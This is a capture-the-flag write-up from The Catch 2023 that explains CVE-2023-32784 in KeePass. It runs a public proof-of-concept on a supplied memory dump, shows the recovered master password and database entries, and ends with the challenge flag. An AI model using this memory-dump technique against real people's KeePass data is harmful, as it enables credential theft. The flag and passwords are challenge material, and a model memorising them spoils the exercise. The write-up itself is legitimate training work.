# Captain's Password This is a write-up for a challenge at The Catch 2023 CTF. ## The Assignment The assignment: > Ahoy, officer, > our **captain** has had too much naval espresso and is temporarily **unfit** for duty. The **chief officer** is in command now, but he **does not know the captain's passwords** for key ship systems. Good news is that the captain uses a password manager, and the ship's chief engineer was able to acquire the captain's computer memory crash dump. Your task is to acquire the password for the signalization system. > > May you have fair winds and following seas! > > Download the database and memory dump. Attached were two files, `captain.kdbx` and `crashdump.dmp`. The hint was: > At first, identify the password manager. `kdbx` is the extension that the **KeePass** password manager uses. To access the content, we needed the **master password**. There was a vulnerability ([CVE-2023-32784](https://nvd.nist.gov/vuln/detail/CVE-2023-32784)) in KeePass, which we learned about by searching for "memory dump keepass." ## [CVE-2023-32784](https://nvd.nist.gov/vuln/detail/CVE-2023-32784): How It Works From a [PoC README on GitHub](https://github.com/vdohney/keepass-password-dumper): > KeePass 2.X uses a custom-developed text box for password entry, SecureTextBoxEx. This text box is not only used for the master password entry, but in other places in KeePass as well, like password edit boxes (so the attack can also be used to recover their contents). > > The flaw exploited here is that **for every character** typed, **a leftover string is created in memory.** Because of how .NET works, it is nearly impossible to get rid of it once it gets created. For example, when "Password" is typed, it will result in these leftover strings: **•a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d.** The PoC application **searches the dump for these patterns** and offers a likely password character for each position in the password. ## Running the PoC We might need to install the correct version of .NET first: ```markdown $ wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh $ chmod +x dotnet-install.sh $ ./dotnet-install.sh --channel 7.0 ``` We ran the PoC from the directory where we cloned [the GitHub repository](https://github.com/vdohney/keepass-password-dumper): ``` $ ~/.dotnet/dotnet run ../crashdump.dmp Unknown characters are displayed as "●" 1.: ● 2.: ), ÿ, a, :, |, í, W, 5, , r, ¸, 3.: s, 4.: s, 5.: w, 6.: o, 7.: r, 8.: d, 9.: 4, 10.: m, 11.: y, 12.: p, 13.: r, 14.: e, 15.: c, 16.: i, 17.: o, 18.: u, 19.: s, 20.: s, 21.: h, 22.: i, 23.: p, Combined: ●{), ÿ, a, :, |, í, W, 5, , r, ¸}ssword4mypreciousship ``` From the output, we could guess that the correct password was: `password4mypreciousship` ### Entries in the database We could open the database in KeePass, KeePassX, or KeePassXC. Some notable entries were: * Warehouse Management * [ ] rumrumrum3 * Fire Extinguishing System * [ ] Fire!Fire!Fire! * wifi-crew * [ ] username: captain * [ ] password: obvious If we were only interested in the flag and not the jokes, we could use the search function (being the *Captain Obvious* now) and searched for "flag": * Main Flag System * [ ] FLAG{pyeB-941A-bhGx-g3RI}